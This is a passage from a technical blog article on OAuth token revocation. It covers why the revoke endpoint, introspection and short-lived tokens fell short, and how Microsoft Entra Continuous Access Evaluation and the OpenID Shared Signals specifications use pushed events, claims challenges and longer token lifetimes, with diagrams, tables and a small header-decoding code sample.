    RFC 7662 Token Introspection :done, a3, 2015-10, 30d
    RFC 8417 SET                 :done, a4, 2018-07, 30d
    RFC 8935 SET Push            :done, a5, 2020-11, 30d
    RFC 8936 SET Poll            :done, a6, 2020-11, 30d
    section Zero Trust thinking
    BeyondCorp paper             :done, b1, 2014-12, 30d
    NIST SP 800-207 Final        :done, b2, 2020-08, 30d
    section CAEP origin and OIDF
    Tulshibagwale CAEP post      :done, c1, 2019-02, 30d
    OIDF Shared Signals WG       :done, c2, 2019-09, 30d
    SSF 1.0 CAEP 1.0 RISC 1.0    :done, c3, 2025-09, 30d
    section Microsoft Entra CAE
    Limited preview Weinert      :done, d1, 2020-04, 30d
    Expanded preview Simons      :done, d2, 2020-10, 30d
    General Availability         :done, d3, 2022-01, 30d
&lt;p&gt;The OAuth 2.0 designers traded revocation latency for throughput on purpose [@rfc-6749]. Once that gap proved unacceptable, three obvious patches were tried. None of them worked. To see &lt;em&gt;why&lt;/em&gt; none of them worked is to understand the negative space CAE was designed to fill.&lt;/p&gt;
&lt;h2&gt;3. Three Patches, Three Failures&lt;/h2&gt;
&lt;p&gt;Between 2013 and the late 2010s, the OAuth community published three patches for RFC 6749&apos;s revocation gap. Each was rationally adopted; each was rationally abandoned at hyperscale. This section is the genealogy of those failures, because what each one got wrong defines the shape of the design that finally worked.&lt;/p&gt;
&lt;h3&gt;Patch 1: RFC 7009 -- the &lt;code&gt;/revoke&lt;/code&gt; endpoint (August 2013)&lt;/h3&gt;
&lt;p&gt;In August 2013, Torsten Lodderstedt of Deutsche Telekom, Stefanie Dronia, and Marius Scurtescu of Google published RFC 7009, &lt;em&gt;OAuth 2.0 Token Revocation&lt;/em&gt; [@rfc-7009]. The contribution was a standardized HTTP endpoint, &lt;code&gt;/revoke&lt;/code&gt;, that a client could POST a token to in order to invalidate it. The mental model is the logout button: when a user signs out, the client tells the authorization server &quot;I&apos;m done with this token, please retire it.&quot;&lt;/p&gt;
&lt;p&gt;The failure mode is in the threat model. RFC 7009 is &lt;em&gt;client-initiated&lt;/em&gt;. The token holder asks for revocation. But the scenario that motivates CAE is precisely the one where the token holder is uncooperative. A fired employee will not POST their access token to &lt;code&gt;/revoke&lt;/code&gt; on the way out the door. An attacker who has stolen a token will certainly not. The administrator on the other side cannot use the endpoint either, because they do not possess the bearer token.&lt;/p&gt;
&lt;p&gt;Worse, RFC 7009&apos;s Implementation Note (Section 3) is candid about self-contained tokens: the only standardized recourse is &quot;some (currently non-standardized) backend interaction between the authorization server and the resource server&quot; when immediate revocation is desired [@rfc-7009]. Read that carefully. The spec admits there is no spec. The JWT in flight at the resource server is &lt;em&gt;cryptographically valid until it expires&lt;/em&gt;. The authorization server can mark it revoked in a local database, but the resource server never asks. It validates the signature locally. The revocation event never crosses the wire.&lt;/p&gt;
&lt;p&gt;RFC 7009 works for opaque tokens with a token-introspection back-channel. It does not, by itself, solve revocation for self-contained JWT bearers -- which by the mid-2010s were the dominant pattern in the cloud.&lt;/p&gt;
&lt;h3&gt;Patch 2: RFC 7662 -- the &lt;code&gt;/introspect&lt;/code&gt; endpoint (October 2015)&lt;/h3&gt;
&lt;p&gt;Two years later, in October 2015, Justin Richer published RFC 7662, &lt;em&gt;OAuth 2.0 Token Introspection&lt;/em&gt; [@rfc-7662]. The mechanism: on every request, the resource server calls a &lt;code&gt;/introspect&lt;/code&gt; endpoint on the authorization server with the bearer token. The AS replies with the token&apos;s current state. If the token has been revoked, &lt;code&gt;/introspect&lt;/code&gt; returns &lt;code&gt;active: false&lt;/code&gt;, and the resource server denies the request.&lt;/p&gt;
&lt;p&gt;This is correct. It also reintroduces the WAM bottleneck that OAuth was designed to escape.&lt;/p&gt;
&lt;p&gt;For an AS serving billions of requests per day -- Microsoft Graph as one example, Google&apos;s IdP as another -- making &lt;code&gt;/introspect&lt;/code&gt; the per-request critical path turns the authorization server into a synchronous dependency on every API call against every resource server in the estate. Latency adds up. Availability becomes shared. If the AS has a bad five minutes, every resource server has a bad five minutes simultaneously. The architecture OAuth bought with self-contained tokens -- resource server scales independently of AS -- gets traded back for exactly the WAM property that motivated OAuth&apos;s existence.&lt;/p&gt;

RFC 7662 introspection is alive and well. It remains the right choice for opaque-token systems and on-premises IdPs where the resource server count is small, the per-request latency budget is generous, and the AS is well within capacity. The criticism here is structural and only applies at hyperscale public-cloud volumes. RFC 7662 was not killed by RFC 7009 or by CAE; it is a parallel path that continues to serve a substantial fraction of the deployed OAuth surface.
&lt;h3&gt;Patch 3: Make the token life so short revocation does not matter&lt;/h3&gt;
&lt;p&gt;The third patch was the obvious one. If you cannot revoke a token mid-life, make its life short. Issue access tokens with a minutes-long lifetime, the way early Microsoft experiments did. The revocation window collapses. Problem solved.&lt;/p&gt;
&lt;p&gt;Microsoft tried it. The retrospective is unusually candid. On April 21, 2020, Alex Weinert, then Director of Identity Security at Microsoft, published &lt;em&gt;Moving towards real time policy and security enforcement&lt;/em&gt; on the Azure Active Directory Identity Blog [@weinert-2020-04-real-time]. (The original lives at post ID 1276933 on Microsoft&apos;s tech community; the full body is preserved in Microsoft&apos;s Japanese translation on the jpazureid GitHub mirror [@jpazureid-blog-1-japanese].) The post names the failure mode in one sentence:&lt;/p&gt;

&quot;We have experimented with the &quot;blunt object&quot; approach of reduced token lifetimes but found they can degrade user experiences and reliability without eliminating risks.&quot; -- Alex Weinert, Microsoft, April 21, 2020 [@weinert-2020-04-real-time]
&lt;p&gt;Two things break. First, &lt;em&gt;user experience and reliability&lt;/em&gt;. Every short-lifetime boundary forces every active client to round-trip the IdP for a fresh token. For Outlook, Teams, Word Online, OneDrive, and every other client an enterprise user has open at once, that is a wave of token requests per user per cycle. Multiplied by Microsoft 365 active users, the load profile creates real outages. Network blips that would otherwise be invisible surface as failed refreshes, with user-visible re-authentication prompts. Second, &lt;em&gt;it does not eliminate the risk&lt;/em&gt;. A minutes-long window is still a window. A fired employee can read or exfiltrate a great deal of email in that window. You have paid the full user-experience cost and still left a non-trivial breach surface.&lt;/p&gt;
&lt;p&gt;This was the third failure. The negative space across the three patches defines the shape any real solution has to take: it must be &lt;em&gt;server-initiated&lt;/em&gt; (not RFC 7009), it must be &lt;em&gt;push-based&lt;/em&gt; rather than per-request poll (not RFC 7662), and it must &lt;em&gt;separate revocation from expiry&lt;/em&gt; so the IdP does not pay for every revocation with a refresh-load spike (not the short-lifetime patch). The three failures exhaust the surface of the obvious fix.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Each of the three patches fails for a different reason; together they rule out everything except server-initiated push subscription that decouples revocation from expiry.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;If the patches all fail, the next move has to be architectural. The first published statement of that architecture was Atul Tulshibagwale&apos;s February 2019 Google blog post -- and the move he proposed is the one Microsoft would ship three years later.&lt;/p&gt;
&lt;h2&gt;4. Four Generations of Session Enforcement&lt;/h2&gt;
&lt;p&gt;Walk forward through the genealogy of session enforcement and the breakthrough in Section 5 stops looking like a stroke of genius and starts looking like the only move the design space had left. Four generations, each killed by a documented limit of the previous one.&lt;/p&gt;
&lt;h3&gt;Generation 0: WAM (pre-2012)&lt;/h3&gt;
&lt;p&gt;Per-request synchronous round-trip to a Policy Decision Point. Instant revocation; chatty bottleneck; no federation. Killed by cloud-scale request rates and the rise of cross-organization SaaS, where the protected resource and the policy authority no longer lived in the same trust domain. WAM remains valuable in single-tenant enterprise contexts, but for the public-cloud API mesh it cannot scale.&lt;/p&gt;
&lt;h3&gt;Generation 1: Static-expiry JWT (2012-2020)&lt;/h3&gt;
&lt;p&gt;Self-contained signed bearer tokens validated locally at the resource server. Revocation approximated by expiry per RFC 6749 [@rfc-6749]. Throughput scales; federation works; revocation is acceptable when the lifetime is short and the threat model is benign. Killed by (a) the fired-employee window, (b) the three failed Section 3 patches, and (c) the philosophical pressure from &lt;a href=&quot;https://paragmali.com/blog/the-thirteen-months-that-made-zero-trust-unavoidable-the-win/&quot; rel=&quot;noopener&quot;&gt;Zero Trust&lt;/a&gt; to treat sessions as continuously re-evaluated.&lt;/p&gt;
&lt;h3&gt;Generation 2: Microsoft CAE (limited preview April 2020, GA January 10, 2022)&lt;/h3&gt;
&lt;p&gt;The first production solution. Limited preview launched in April 2020 with Alex Weinert&apos;s &lt;em&gt;Moving towards real time policy and security enforcement&lt;/em&gt; announcement [@weinert-2020-04-real-time]. Expanded public preview October 2020 [@simons-2020-10-expanded-preview; @vansurksum-2020-10-10]. General Availability January 10, 2022, announced by Alex Simons, Corporate VP for Program Management in the Microsoft Identity Division [@simons-2022-01-ga-rss].&lt;/p&gt;
&lt;p&gt;The architecture is a private push-subscription channel between Entra and a small set of Microsoft 365 resource providers, with a wire-level handshake (the &lt;code&gt;claims&lt;/code&gt; challenge) for telling the client to re-acquire a token reflecting new state. Access-token lifetime extends from the default 1 hour to up to 28 hours specifically for CAE-aware sessions [@ms-cae-concept]. We will unpack the mechanism in Section 5.&lt;/p&gt;
&lt;p&gt;The Gen-2 limitation that motivated Gen 3: the wire format is &lt;em&gt;Microsoft-internal&lt;/em&gt;. A SaaS vendor that wants the same revocation properties for its own resource provider cannot use Microsoft&apos;s CAE channel. The protocol does not federate.&lt;/p&gt;
&lt;h3&gt;Generation 3: OpenID SSF 1.0 + CAEP 1.0 + RISC 1.0 (Final Specifications, September 2, 2025)&lt;/h3&gt;
&lt;p&gt;The OpenID Foundation generalized the Microsoft pattern into a vendor-neutral specification. On September 2, 2025, three Final Specifications were approved: the Shared Signals Framework 1.0 (SSF), the Continuous Access Evaluation Profile 1.0 (CAEP), and the Risk and Incident Sharing and Coordination 1.0 (RISC) [@openid-three-final-specs; @openid-sharedsignals-wg].&lt;/p&gt;
&lt;p&gt;The wire envelope is IETF RFC 8417&apos;s Security Event Token (SET), published in July 2018 by Phil Hunt (Oracle), Michael Jones (Microsoft), William Denniss (Google), and Morteza Ansari (Cisco) [@rfc-8417]. A SET is a signed JWT carrying a single security event. The transport layer is RFC 8935 push (POST over TLS from transmitter to receiver) and RFC 8936 poll (recipient-initiated retrieval), both published November 2020 by Annabelle Backman and collaborators [@rfc-8935; @rfc-8936]. SSF defines the subscription model -- streams, subjects, transmitter and receiver metadata endpoints. CAEP and RISC define the &lt;em&gt;vocabulary&lt;/em&gt; of events that can ride that envelope.&lt;/p&gt;

IETF RFC 8417&apos;s standardized signed-JWT envelope for transmitting security-relevant events between systems. Each SET carries exactly one event with a well-defined event-type URI; the envelope is signature-protected and timestamp-bearing. SET is the wire format underlying CAEP, SSF, and RISC, as well as Microsoft&apos;s internal CAE protocol [@rfc-8417].
&lt;p&gt;RFC 8417 was a cross-vendor IETF effort that pre-dated the OpenID Shared Signals working group by a year. Phil Hunt was at Oracle; Michael Jones at Microsoft; William Denniss at Google; Morteza Ansari at Cisco. The envelope-only design -- leaving event vocabularies to higher-layer profiles -- is what allowed both Microsoft&apos;s internal protocol and the OpenID profiles to converge on the same wire format without coordination [@rfc-8417].&lt;/p&gt;

flowchart TD
    L4[&quot;Layer 4: Event vocabularies&lt;br /&gt;CAEP 1.0 (session) and RISC 1.0 (account)&quot;]
    L3[&quot;Layer 3: Subscription and stream model&lt;br /&gt;OpenID SSF 1.0&quot;]
    L2[&quot;Layer 2: HTTP transport&lt;br /&gt;RFC 8935 push, RFC 8936 poll&quot;]
    L1[&quot;Layer 1: Signed event envelope&lt;br /&gt;RFC 8417 Security Event Token (SET)&quot;]
    L4 --&amp;gt; L3
    L3 --&amp;gt; L2
    L2 --&amp;gt; L1
&lt;p&gt;The generation chain has a documented engineering reason for each transition. The comparison matrix below pulls the essentials together.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Revocation latency&lt;/th&gt;
&lt;th&gt;Strengths&lt;/th&gt;
&lt;th&gt;Weaknesses&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;WAM (Gen 0)&lt;/td&gt;
&lt;td&gt;pre-2012&lt;/td&gt;
&lt;td&gt;Instant&lt;/td&gt;
&lt;td&gt;Authoritative state, instant enforcement&lt;/td&gt;
&lt;td&gt;No federation, per-request bottleneck&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Static-expiry JWT (Gen 1)&lt;/td&gt;
&lt;td&gt;2012-2020&lt;/td&gt;
&lt;td&gt;Up to token lifetime (1h-24h)&lt;/td&gt;
&lt;td&gt;O(1) RP validation, federation works&lt;/td&gt;
&lt;td&gt;No revocation; fired-employee window&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Short-lifetime patch&lt;/td&gt;
&lt;td&gt;mid-2010s&lt;/td&gt;
&lt;td&gt;Minutes&lt;/td&gt;
&lt;td&gt;Conceptually simple&lt;/td&gt;
&lt;td&gt;Load amplification, window remains, UX degradation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;RFC 7662 introspection&lt;/td&gt;
&lt;td&gt;2015 onward&lt;/td&gt;
&lt;td&gt;Instant&lt;/td&gt;
&lt;td&gt;Standardized, works for opaque tokens&lt;/td&gt;
&lt;td&gt;AS becomes per-request critical path&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Microsoft CAE (Gen 2)&lt;/td&gt;
&lt;td&gt;2020-2022&lt;/td&gt;
&lt;td&gt;Up to 15 min critical; instant IP&lt;/td&gt;
&lt;td&gt;Push, decoupled from request rate, long tokens safe&lt;/td&gt;
&lt;td&gt;Microsoft-internal protocol; tiny RP set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenID SSF/CAEP (Gen 3)&lt;/td&gt;
&lt;td&gt;2025 onward&lt;/td&gt;
&lt;td&gt;Vendor-dependent&lt;/td&gt;
&lt;td&gt;Vendor-neutral standard, cross-SaaS&lt;/td&gt;
&lt;td&gt;Receiver adoption still early&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

flowchart LR
    G0[&quot;Gen 0: WAM&lt;br /&gt;per-request PDP&quot;]
    G1[&quot;Gen 1: Static-expiry JWT&lt;br /&gt;RFC 6749 (2012)&quot;]
    G2[&quot;Gen 2: Microsoft CAE&lt;br /&gt;GA January 2022&quot;]
    G3[&quot;Gen 3: OpenID SSF and CAEP&lt;br /&gt;Final September 2025&quot;]
    G0 -- &quot;cloud scale and federation&quot; --&amp;gt; G1
    G1 -- &quot;fired-employee window, patches fail&quot; --&amp;gt; G2
    G2 -- &quot;Microsoft-only, no cross-SaaS&quot; --&amp;gt; G3
&lt;p&gt;Knowing the lineage is not knowing the trick. What is the actual mechanism CAE deploys -- the thing that turns this standards-history arc into a feature that ships and makes 28-hour tokens defensible? It has three parts, and once you see them together, you understand why long tokens are safe.&lt;/p&gt;
&lt;h2&gt;5. Subscription, Claims Challenge, Extended Lifetime&lt;/h2&gt;
&lt;p&gt;Three innovations, none new in isolation, all unprecedented in combination. This is the section where you see the trick.&lt;/p&gt;
&lt;p&gt;Atul Tulshibagwale&apos;s 2019 framing names the move: &quot;Our vision for continuous access evaluation is based on a publish-and-subscribe (&apos;pub-sub&apos;) approach... It&apos;s complementary to federated or cert-based authentication... It&apos;s not as chatty as WAM... It doesn&apos;t impact latency for user access&quot; [@tulshibagwale-2019-google-blog]. Pub-sub is the third option between WAM&apos;s per-request chattiness and RFC 6749&apos;s fire-and-forget. Subscription is the channel; claims challenge is the wire-level handshake; extended lifetime is the user-experience prize.&lt;/p&gt;
&lt;h3&gt;Part 1: Subscription&lt;/h3&gt;
&lt;p&gt;Microsoft&apos;s CAE concept page describes the architecture in one sentence that rewards close reading:&lt;/p&gt;

Timely response to policy violations or security issues really requires a &apos;conversation&apos; between the token issuer Microsoft Entra, and the relying party (enlightened app). -- Microsoft Learn, *Continuous access evaluation in Microsoft Entra* [@ms-cae-concept]
&lt;p&gt;The word &lt;em&gt;conversation&lt;/em&gt; is the architecture. The relying party (a CAE-aware Microsoft 365 workload such as Exchange Online) subscribes to a finite, documented set of &lt;em&gt;critical events&lt;/em&gt; for the subjects it cares about. Entra pushes events to the RP as state changes. State is cached at the RP. On the hot path -- the per-request data plane -- the RP does an O(1) JWT signature verification plus an O(1) hash-table lookup of cached revocation state. No back-channel round-trip on the hot path. The 28-hour token costs no more to validate than the 1-hour token it replaced [@ms-cae-concept].&lt;/p&gt;
&lt;p&gt;This is the move that defeats RFC 7662. The state lives at the RP, not at the AS. The control-plane cost scales with the rate of &lt;em&gt;events&lt;/em&gt;, not the rate of &lt;em&gt;requests&lt;/em&gt;. Push, not poll.&lt;/p&gt;
&lt;h3&gt;Part 2: The claims challenge&lt;/h3&gt;
&lt;p&gt;When state at the RP changes -- because a push event has arrived saying &quot;this user&apos;s password has been reset&quot; -- the RP cannot reach into a request that has already been accepted and is being served. CAE is in-band with the &lt;em&gt;next&lt;/em&gt; request, not the current one. The next time the client presents the stale token, the RP rejects it with &lt;code&gt;HTTP 401&lt;/code&gt; and a specific header:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;,
                  claims=&quot;eyJhY2Nlc3NfdG9rZW4iOnsiYWNyc...&quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;code&gt;claims&lt;/code&gt; parameter is a base64url-encoded JSON object that tells the client what to re-acquire from the IdP. The Microsoft Authentication Library (MSAL) on the client decodes the challenge transparently and requests a new access token from Entra with the indicated claims. Entra either issues a fresh CAE-aware token (if authorization still holds) or rejects, forcing interactive re-authentication. The client retries the original API call with the new token [@ms-cae-app-resilience].&lt;/p&gt;

The HTTP-level mechanism by which a CAE-aware resource provider signals to a client that the presented token must be re-acquired with fresh state. The challenge is conveyed as a `WWW-Authenticate: Bearer error=&quot;insufficient_claims&quot;` header with a base64url-encoded `claims` parameter; current Microsoft Authentication Library (MSAL) releases decode and handle it automatically when the client app registration declares the `xms_cc` capability `[&quot;cp1&quot;]` [@ms-cae-app-resilience].
&lt;p&gt;This is the move that defeats RFC 7009. Revocation is initiated by the &lt;em&gt;resource provider&apos;s view of the IdP&apos;s state&lt;/em&gt;, not by the token holder. A fired employee&apos;s client cannot opt out of the claims challenge; the RP will not serve any further request until a fresh token arrives that reflects the post-revocation state.&lt;/p&gt;
&lt;p&gt;{`
// A real-shape WWW-Authenticate header from a CAE-aware resource provider.
// The &apos;claims&apos; parameter is base64url-encoded JSON.
const header = &apos;Bearer error=&quot;insufficient_claims&quot;, claims=&quot;eyJhY2Nlc3NfdG9rZW4iOnsibmJmIjp7ImVzc2VudGlhbCI6dHJ1ZSwgInZhbHVlIjoiMTcyMDQ4MDA0MyJ9fX0=&quot;&apos;;&lt;/p&gt;
&lt;p&gt;// Extract the claims parameter
const match = header.match(/claims=&quot;([^&quot;]+)&quot;/);
const b64 = match ? match[1] : null;&lt;/p&gt;
&lt;p&gt;// base64url decode (Node &apos;Buffer&apos; would work; here we use the browser-safe approach)
function b64urlDecode(s) {
  s = s.replace(/-/g, &apos;+&apos;).replace(/_/g, &apos;/&apos;);
  while (s.length % 4) s += &apos;=&apos;;
  return atob(s);
}&lt;/p&gt;
&lt;p&gt;const claimsJson = b64urlDecode(b64);
console.log(JSON.parse(claimsJson));
// {
//   &quot;access_token&quot;: {
//     &quot;nbf&quot;: {
//       &quot;essential&quot;: true,
//       &quot;value&quot;: &quot;1720480043&quot;
//     }
//   }
// }
// MSAL reads this and requests a new token whose &apos;nbf&apos; (not-before) is at least
// the supplied timestamp -- i.e., a token issued after the state change.
`}&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;nbf&lt;/code&gt; (not-before) claim challenge is the most common shape: the RP is telling the client &quot;give me a token issued after this moment.&quot; The client requests one. Entra checks current state -- did the user get disabled? did the password get reset? did the risk score elevate? -- and either issues or denies. The wire format is simple enough to inspect in a browser tab, which is part of why the architecture has been able to standardize: there is no magic to reverse-engineer.&lt;/p&gt;
&lt;h3&gt;Part 3: Extended lifetime, the prize&lt;/h3&gt;
&lt;p&gt;The first two parts buy you the third. Once revocation is push-based and the claims challenge gives the RP a way to evict stale tokens within seconds of seeing a control-plane event, the expiry timer stops carrying the security weight. Tokens can live longer because the expiry is no longer the only revocation mechanism.&lt;/p&gt;
&lt;p&gt;Microsoft documents the upper bound as &quot;up to 28 hours&quot; for CAE-aware sessions [@ms-cae-concept; @ms-cae-app-resilience]. The default for non-CAE-capable clients remains 1 hour. This is the move that defeats the short-lifetime patch: the IdP load profile collapses because tokens refresh once a day, not on a per-minute cycle, and the revocation window is dramatically smaller -- not because expiry shrank, but because the channel now does the revocation work expiry used to do.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Long-lived access tokens are safe only when paired with a near-real-time revocation channel. CAE is the channel. Subscription provides the push, the claims challenge is the in-band handshake the push enables, and the 28-hour lifetime is what the channel buys -- not what the channel costs.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;The full round trip&lt;/h3&gt;
&lt;p&gt;The three parts interlock. The complete flow, from a state change at Entra to a re-validated request, runs end-to-end through every layer the article has named.&lt;/p&gt;

sequenceDiagram
    participant Admin
    participant Entra as Microsoft Entra
    participant Client as Client (MSAL)
    participant RP as Resource Provider (e.g. Exchange Online)
    Admin-&amp;gt;&amp;gt;Entra: Disable user account
    Entra-&amp;gt;&amp;gt;RP: Push critical-event SET (account disabled)
    Note over RP: Updates cached revocation state for (sub, tenant)
    Client-&amp;gt;&amp;gt;RP: GET /me/messages (Authorization Bearer old token)
    Note over RP: Validates JWT signature O(1), checks cached state
    RP--&amp;gt;&amp;gt;Client: 401 plus WWW-Authenticate insufficient_claims
    Note over Client: MSAL parses claims challenge from header
    Client-&amp;gt;&amp;gt;Entra: Token request with claims
    Note over Entra: Checks current user state, account is disabled
    Entra--&amp;gt;&amp;gt;Client: 400 invalid_grant or interactive re-auth required
    Note over Client: User cannot recover, session terminates
&lt;p&gt;Three moves, one design. Remove any one and the system collapses. Subscription without a claims challenge gives you push events the RP cannot act on at the wire. Claims challenge without subscription gives you a 401 mechanism with no information to decide when to fire it. Extended lifetime without either gives you Generation 1&apos;s fired-employee window. The 28-hour token is not the &lt;em&gt;cost&lt;/em&gt; of CAE; it is what CAE &lt;em&gt;purchases&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;This is the design. What does it actually do in production today, and where does it stop?&lt;/p&gt;
&lt;h2&gt;6. CAE as Deployed in Microsoft Entra (2026)&lt;/h2&gt;
&lt;p&gt;Concrete answers to concrete questions. Which events trigger CAE? Who participates? What is the actual SLA? How long do tokens actually live? No marketing language; only what Microsoft Learn currently documents.&lt;/p&gt;
&lt;h3&gt;Critical event evaluation events&lt;/h3&gt;
&lt;p&gt;Microsoft Learn lists exactly five events that drive &lt;em&gt;critical event evaluation&lt;/em&gt; at the IdP-to-RP boundary [@ms-cae-concept]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A user account is deleted or disabled.&lt;/li&gt;
&lt;li&gt;A password for a user is changed or reset.&lt;/li&gt;
&lt;li&gt;Multi-factor authentication is enabled for the user.&lt;/li&gt;
&lt;li&gt;An administrator explicitly revokes all refresh tokens for a user.&lt;/li&gt;
&lt;li&gt;High user risk is detected by Microsoft Entra ID Protection.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;These five events propagate from Entra to the participating CAE-aware resource providers via the push channel. Microsoft&apos;s published service-level objective is &quot;up to 15 minutes&quot; for critical-event propagation [@ms-cae-concept]. That is not the same as &quot;instant.&quot; The phrase to avoid is &quot;CAE delivers instant revocation&quot;; the accurate phrase is &quot;CAE delivers near-real-time revocation, typically within 15 minutes for critical events.&quot;&lt;/p&gt;
&lt;p&gt;A separate scenario -- &lt;em&gt;Conditional Access policy evaluation&lt;/em&gt; -- covers network and IP-location changes. Here the SLA is different: IP-location enforcement is &lt;strong&gt;instant&lt;/strong&gt; per Microsoft&apos;s published documentation [@ms-cae-concept]. The difference is mechanical. IP location is a property the RP sees directly on every request (the source IP of the incoming HTTP connection); the RP can compare it against the location constraints attached to the session and reject locally with no propagation delay. Critical events have to travel from Entra to the RP through the event channel, and that travel has a 15-minute budget at Microsoft 365 scale.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Event&lt;/th&gt;
&lt;th&gt;Source&lt;/th&gt;
&lt;th&gt;Propagation&lt;/th&gt;
&lt;th&gt;Notes&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Account deleted or disabled&lt;/td&gt;
&lt;td&gt;Entra ID directory&lt;/td&gt;
&lt;td&gt;Up to 15 min&lt;/td&gt;
&lt;td&gt;Honored by Exchange Online, SharePoint Online, Teams, Graph (CA)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Password changed or reset&lt;/td&gt;
&lt;td&gt;Entra ID directory&lt;/td&gt;
&lt;td&gt;Up to 15 min&lt;/td&gt;
&lt;td&gt;Same RP set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MFA enabled for user&lt;/td&gt;
&lt;td&gt;Entra ID directory&lt;/td&gt;
&lt;td&gt;Up to 15 min&lt;/td&gt;
&lt;td&gt;Same RP set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;All refresh tokens revoked (admin)&lt;/td&gt;
&lt;td&gt;Entra ID admin action&lt;/td&gt;
&lt;td&gt;Up to 15 min&lt;/td&gt;
&lt;td&gt;Same RP set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;High user risk detected&lt;/td&gt;
&lt;td&gt;Entra ID Protection&lt;/td&gt;
&lt;td&gt;Up to 15 min&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;SharePoint Online does not honor user-risk events&lt;/strong&gt; [@ms-cae-concept]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IP location changed (CA policy)&lt;/td&gt;
&lt;td&gt;Resource-provider observation&lt;/td&gt;
&lt;td&gt;Instant&lt;/td&gt;
&lt;td&gt;Conditional Access policy evaluation path; strict location enforcement [@ms-strict-location-enforcement]&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Microsoft Defender for Endpoint and Microsoft Intune (MDM) are &lt;em&gt;signal sources&lt;/em&gt; into Conditional Access. They contribute to the risk score and device-compliance state that drive CA policy decisions, but they are &lt;strong&gt;not&lt;/strong&gt; CAE-consuming resource providers. They do not subscribe to Entra critical-event notifications and they do not enforce the claims-challenge handshake on token-bearing requests. The CAE-aware RP set is exactly: Exchange Online, SharePoint Online, Microsoft Teams, and Microsoft Graph (the last only for Conditional Access policy evaluation) [@ms-cae-concept]. If you read older deck slides or vendor blog posts that list MDE or Intune as CAE participants, they are conflating the signal-source role with the resource-provider role.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The SharePoint Online user-risk caveat is a concrete example of why &quot;CAE-aware&quot; is not a binary property at the workload level. SharePoint Online is fully CAE-aware for the first four critical events on the list; it just does not subscribe to user-risk events specifically. The lesson is that you must read the per-workload documentation carefully when designing controls that depend on a specific event&apos;s enforcement [@ms-cae-concept].&lt;/p&gt;
&lt;h3&gt;Workloads that participate&lt;/h3&gt;
&lt;p&gt;The CAE-aware resource-provider set, per Microsoft Learn [@ms-cae-concept]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Exchange Online&lt;/strong&gt; -- full CAE consumer (initial implementation, October 2020).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SharePoint Online&lt;/strong&gt; -- full CAE consumer, with the user-risk caveat noted above.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Teams&lt;/strong&gt; -- full CAE consumer (initial implementation), per Alex Simons&apos;s January 2022 GA announcement [@simons-2022-01-ga-rss].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Graph&lt;/strong&gt; -- consumes Conditional Access policy evaluation events (the IP-location instant path); narrower scope than the M365 productivity workloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Client-side support is also explicit. Microsoft&apos;s compatibility tables in the CAE concept page enumerate which client and server combinations are &lt;em&gt;Supported&lt;/em&gt;, &lt;em&gt;Partially supported&lt;/em&gt;, or &lt;em&gt;Not Supported&lt;/em&gt; on every major operating system and form factor [@ms-cae-concept]. Office web apps against SharePoint Online and Exchange Online are documented as &lt;em&gt;Not Supported&lt;/em&gt; on several combinations; every Teams client surface shows as &lt;em&gt;Partially supported&lt;/em&gt;. The point is not that CAE is broken on these surfaces -- it is that Microsoft documents the rough edges in primary source, and tenant administrators who care about specific scenarios must read the table.&lt;/p&gt;
&lt;h3&gt;Tokens and clients&lt;/h3&gt;
